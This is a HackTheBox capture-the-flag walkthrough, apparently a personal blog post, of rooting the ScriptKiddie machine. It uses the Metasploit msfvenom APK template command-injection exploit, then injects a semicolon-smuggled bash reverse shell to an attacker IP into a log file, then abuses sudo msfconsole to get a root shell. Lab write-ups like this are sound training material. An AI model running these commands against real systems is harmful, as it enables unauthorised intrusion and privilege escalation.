ScriptKiddie HackTheBox WalkThrough

ScriptKiddie Hackthebox Walkthrough

This is ScriptKiddie HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted ScriptKiddie HackTheBox machine. Before starting let us know something about this machine. It is Linux OS box with IP address 10.10.10.226 and difficulty easy assigned by its maker.

First of all connect your PC with HackTheBox VPN and make sure your connectivity with ScriptKiddie machine by pinging its IP 10.10.10.226. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it also helps in finding vulnerabilities without much effort. I have used nmap for this task and the result is given below:-

Scanning

$ sudo nmap -sC -p- -T3 -sV -oA nmap/full_scan 10.10.10.226

$ cat nmap/full_scan.nmap

Performing Nmap Scan during ScriptKiddie Hackthebox Walkthrough

Full port scan found ports 22 and 5000 as open. OpenSSH 8.2.p1 on port 22 and Werkzeug Web Server on port 5000 are running. Enumeration on port 22 is useless until we get some known users. Also OpenSSH 8.2p1 is not affected with any well-known vulnerability which will help us in further enumeration. So leave it here and moved forward for enumeration on port 5000. Since httpd server is running on this port so there should also be some website running on this port. The website can be accessed at URL http://10.10.10.226:5000. But before accessing the site let us check Werkzeug 0.16.1 in $searchsploit for known vulnerability. No any vulnerability is found in this version.

Enumerating on Port 5000

Ongoing to the URL http://10.10.10.226:5000 found a dynamic website which consists of nmap, msfvenom and searchsploit tools installed on it. Anyone can use this tool to scan any site, make msfvenom payload and search for available exploits through searchsploit tool.

Scriptkiddie Web Page

I simply tried to test the functionality of payloads and found that we can make payload for Linux, Windows and Android using this tool of the site. It also gives us feature to upload a template file in the given format. Soon I got this file upload feature I tried to upload php file and other format files which generally execute on web server but could not get successful this is because it allows only .exe, .elf and .apk file to upload.

Creating a Sample Windows binary using msfvenom during ScriptKiddie Hackthebox Walkthrough

After some googling and a bit of research I found an exploit for Metasploit-framework 6.0.11. According to this exploit Metasploit Framework’s msfvenom payload generator is affected with APK Template Command Injection Vulnerability when using a crafted APK file as an Android payload template. The affected version is 6.0.11 and below in Community edition and 4.18.0 and below in Pro edition. For more info about this exploit check here and its metasploit module is present at Rapid7 repository.

Metasploit-exploit snippet from Packetstormsecurity.com
Source: https://packetstormsecurity.com/

Currently we don’t know the installed version of metasploit on this machine. But it is worth in giving a try. When I tried to create an apk payload and used that payload to upload as template I could easily exploit the vulnerability and get shell. This confirms that the installed version of metasploit is less than or equal to 6.0.11. So to exploit this vulnerability and get shell follow the given steps.

1. Create msf.apk payload using module unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection. If your metasploit don’t have this module then update it first to latest version or explicitly download this module from Rapid7 repo and add it to metasploit folder and don’t forget to update the database after addition.

Creating APK Payload

msf6 > search metasploit_msfvenom_apk_template

msf6 > use 0

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.13

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit

$ sudo mv /root/.msf4/local/msf.apk .

Creating Msf.apk payload using metasploit during ScriptKiddie Hackthebox Walkthrough

2. Once you have created msf.apk payload start netcat listener in your terminal and in browser create a payload by choosing os as android, lhost as your tun0 IP and choose msf.apk file as template file.

3. At last click on generate button to execute msf.apk file. If all goes correct you will have a shell on your netcat listener.

Getting User Shell

$ nc -nvlp 4444

~whoami && id

Getting user shell in Scriptkiddie Hackthebox machine

We have got user shell as user kid. Let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ ^Z # CTRL + Z to background the shell

$ stty raw -echo

$ fg # To foreground the shell

Upgrading Shell in ScriptKiddie

We have successfully upgraded our Linux shell. Let us capture user flag from user.txt file.

Capture User Flag

$ cat /home/kid/user.txt

Capturing user flag during ScriptKiddie Hackthebox Walkthrough

Privilege Escalation

After some initial enumeration found another user pwn in home directory and it has a file scanlosers.sh. This file is accepting input from hackers file located in /home/kid/logs/ directory and performing some sanitization then perform nmap scan. If you clearly analyze the code you will find a command injection vulnerability into this code while it accepts input from hackers file. We can exploit this vulnerability by using concatenating character ; (Semi-colon). Since hackers file is owned by user pwn so we will get shell as user pwn if we try to get shell by exploiting Command Injection Vulnerability.

$ cat /home/pwn/scanlosers.sh

Scanlosers.sh file content

To exploit this vulnerability and to get shell as user pwn do the following.

$ cd /home/kid/logs/

$ ls -la

$ echo "a b ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/4321 0>&1' #" >> hackers

$ nc -nvlp 4321

$ whoami && id

Getting shell as pwn by exploiting Command Injection Vulnerability during ScriptKiddie Hackthebox Walkthrough

We are pwn user now let us find our PrivEsc vector using which we can perform privilege escalation.

Finding PrivEsc Vector

$ sudo -l command found that user pwn can run /opt/metasploit-framework-6.0.9/msfconsole as root. When I executed $msfconsole as root I could easily spawn root shell from msfconsole. So here our privilege escalation vector is Privilege Escalation using Sudo Right Exploitation.

Sudo-l command output on Scripkiddie Machine

Let us get root shell.

Getting Root Shell

$ sudo /opt/metasploit-framework-6.0.9/msfconsole

msf6 > /bin/bash -i

# whoami && id

Getting Root Shell in ScriptKiddie HTB machine-Snip 1

Snippet

Getting Root Shell in ScriptKiddie HTB machine-Snip 2

We are root now. Let us capture root flag from root.txt file.

Capture Root Flag

# cat /root/root.txt

Capturing root flag in ScriptKiddie HackTheBox machine

This was how I rooted to ScriptKiddie HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/